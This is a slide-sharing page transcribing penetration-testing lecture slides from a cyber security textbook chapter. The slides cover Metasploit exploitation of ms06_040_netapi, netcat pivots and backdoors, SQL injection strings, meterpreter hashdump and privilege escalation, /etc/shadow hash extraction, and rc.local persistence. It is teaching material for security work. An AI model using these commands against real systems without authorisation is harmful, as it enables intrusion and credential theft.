Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Slides:



Advertisements
Similar presentations
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 8, 2014 DRAFT1.
Advertisements

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 8, 2014 DRAFT1.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 8, 2014 DRAFT1.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions April 14, 2015 DRAFT1.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
Hacking Techniques & Intrusion Detection Ali Al-Shemery arabnix [at] gmail.
.  User groups o Cisco, SQL, Virtualization  Conferences o GrrCON, SQL Saturday  Hands-On o Capture the Flag o Forensics  RSS  Exploit-DB updates.
Armitage and Metasploit Penetration Testing Lab
Computer Security Fundamentals
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
© 2010 – MAD Security, LLC All rights reserved ArmitageArmitage A Power User’s Interface for Metasploit.

Network and Server Attacks and Penetration Chapter 12.
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.
Hacking Unix/Linux.
GreenSQL Yuli Stremovsky /MSN/Gtalk:
The Business of Penetration Testing
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
13Computer Intrusions Dr. John P. Abraham Professor UTPA.
EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.
CS391 Computer & Network Security
An Introduction to UNIX Security A Presentation by Trey Evans
COEN 350 Security Threats. Network Based Exploits Phases of an Attack  Reconnaissance  Scanning  Gaining Access  Expanding Access  Covering Tracks.
Mark Shtern. Passwords are the most common authentication method They are inherently insecure.
Penetration Testing Training Day Penetration Testing Tools and Techniques – pt 1 Mike Westmacott, IRM plc Supported by.
Web Application Security ECE ECE Internetwork Security What is a Web Application? An application generally comprised of a collection of scripts.
© 1999 Ernst & Young LLP e e treme hacking Black Hat 1999 Over the Router, Through the Firewall, to Grandma’s House We Go George Kurtz & Eric Schultze.
# Ethical Hacking. 2 # Ethical Hacking - ? Why – Ethical Hacking ? Ethical Hacking - Process Ethical Hacking – Commandments Reporting.
System Hacking Active System Intrusion. Aspects of System Hacking System password guessing Password cracking Key loggers Eavesdropping Sniffers Man in.
Penetration Testing 101 (Boot-camp)
Hacking Windows 9X/ME. Hacking framework Initial access physical access brute force trojans Privilege escalation Administrator, root privileges Consolidation.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Backdoors and Rootkits.
Database Security Cmpe 226 Fall 2015 By Akanksha Jain Jerry Mengyuan Zheng.
CNIT 124: Advanced Ethical Hacking Ch 13: Post Exploitation Part 2.
Module 1A An Introduction to Metasploit – Based upon Chapter 2 of “Metasploit the Penetration testers guide” Based upon Chapter 2 of “Metasploit the Penetration.
Databases Kevin Wright Ben Bruckner Group 40. Outline Background Vulnerabilities Log File Cleaning This Lab.
CIS 450 – Network Security Chapter 10 – UNIX Password Crackers.
Kali Linux BY BLAZE STERLING. Roadmap  What is Kali Linux  Installing Kali Linux  Included Tools  In depth included tools  Conclusion.
Filip Chytrý Everyone of you in here can help us improve online security....
.  User groups o Cisco, SQL, Virtualization  Conferences o GrrCON, SQL Saturday  Hands-On o Capture the Flag o Forensics  RSS  Exploit-DB updates.
PostExploitation CIS 5930/4930 Offensive Computer Security Spring 2014.
Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Penetration Testing Exploiting I: Password Cracking
Penetration Testing Exploiting 2: Compromising Target by Metasploit tool CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Hacking Windows.
Metasploit Framework (MSF) Fundamentals
Enumeration.
Penetration Testing Offline Password Cracking
Hacking SQL Server The best defense is a good offence by Dustin
Daniel Kouril, Ivo Nutar Masaryk University
Hacking Unix/Linux.
Metasploit a one-stop hack shop
Module 22 (Metasploit Introduction)
Computer Security Fundamentals
CIT 480: Securing Computer Systems
Metasploit Project For this exploit I will be using the following strategy Create backdoor exe file Upload file to website Have victim computer download.
Exploiting Metasploitable
Chapter 3. Basic Dynamic Analysis
Week 5.
Web Application Penetration Testing ‘17
Metasploit Analysis Report Overview
Cyber Operation and Penetration Testing Online Password Cracking Cliff Zou University of Central Florida.
Cyber Operation and Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack Cliff Zou University of Central Florida.
Penetration Testing & Network Defense
Network Penetration Testing & Defense
Penetration Testing Dr. X.
Presentation transcript:

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1 Chapter 8: Penetration Testing

Key Forms of Penetration Attacks Buffer overflows Command injection SQL injection 10/12/2014 DRAFT2 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

Network Penetration and Metasploit (Console Session) # cd /pentest/exploits/framework3 #./msfconsole msf > search MS msf > use exploit/windows/smb/ms06_040_netapi msf exploit(ms06_040_netapi) > info msf exploit(ms06_040_netapi) > show payloads msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp msf exploit(ms06_040_netapi) > show options msf exploit(ms06_040_netapi) > set RHOST msf exploit(ms06_040_netapi) > show targets msf exploit(ms06_040_netapi) >set TARGET 5 msf exploit(ms06_040_netapi) >show options msf exploit(ms06_040_netapi) > save msf exploit(ms06_040_netapi) > check msf exploit(ms06_040_netapi) > exploit msf exploit(ms06_040_netapi) > sessions –l msf exploit(ms06_040_netapi) > sessions –i 1 meterpreter> ? 10/12/2014 DRAFT3 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

Netcat, Pivoting, and Raw Shells Setting up and connecting a listener: –Target # nc –l –p 80 –Tester # nc Setting up a 3 machine pivot: –Target (.30)# nc –l –p 80 –RelaySetup# mknod FIFO p –Relay(.10)# nc –l –p 200 FIFO –Tester # nc – /12/2014 DRAFT4 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

Attacking Web/Internet Applications and Databases SQL injection attacks: –false') OR ('true' = 'true’: Grouping by parentheses –false' OR 'true' = 'true'; --: -- is an SQL comment, ends statement –' OR 'true' = 'true' -- –: 0 ; select * from Student where 0=0 ; -- – 0' UNION SELECT * FROM Student where 0=0 -- Paros Proxy is a Backtrack tool for man in the middle attacks 10/12/2014 DRAFT5 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

User Enumeration and Hash Grabbing Gather web addresses on Backtrack –# cd /pentest/enumeration/google/theHarvester –#./theHarvester.py –d cnn.com –b pgp Hash grabbing with meterpreter –meterpreter> use privs –meterpreter> hashdump Enumeration on Linux –# cut –d: –f1 /etc/passwd Hash grabbing from root on Linux # grep –v ':x:' /etc/shadow | grep –v ':!:' | cut –d: – f2 10/12/2014 DRAFT6 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

Password Cracking Password policies on Windows –Local Windows password policies: C:\> net accounts –Windows domain password policies: C:\> net accounts /domain John the Ripper supports password cracking –based on brute force, dictionary, fuzzing Rainbow table techniques are highly efficient algorithms for cracking complex passwords using tables with exhaustive password/hash lists Cain & Abel cracks passwords from all Windows formats, popular network devices, and databases using multiple techniques, such as brute force, dictionary, and rainbow tables 10/12/2014 DRAFT7 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

Privilege Escalation Privilege escalation means gaining administrative privileges, e.g. root Some metasploit exploits automatically escalate, e.g. –modules/exploit/unix/smtp/exim4_string_format, used with the shell_reverse_tcp payload Meterpreter can also escalate, for example: –meterpreter > use privs: Load the Privs module –meterpreter > getsystem –h: Help text –meterpreter > getsystem: Privilege escalation –meterpreter > hashdump: Grab password hashes 10/12/2014 DRAFT8 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

Final Malicious Attack Phases Forward and Reverse Backdoors –Easy to setup using netcat listeners Entrenchment –To survive reboot add backdoor to /etc/rc.local, /etc/rc.d/rc.local (both Linux) or the Startup Folder (Windows) Hidden Files – Easily accomplished on Windows (checkbox) or Linux (. or.. filename) Rootkits –Rootkits are an ultimate form of malicious entrenchment. 10/12/2014 DRAFT9 Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions

REVIEW CHAPTER SUMMARY Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions 10/12/2014 DRAFT10

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com. Inc. All rights reserved.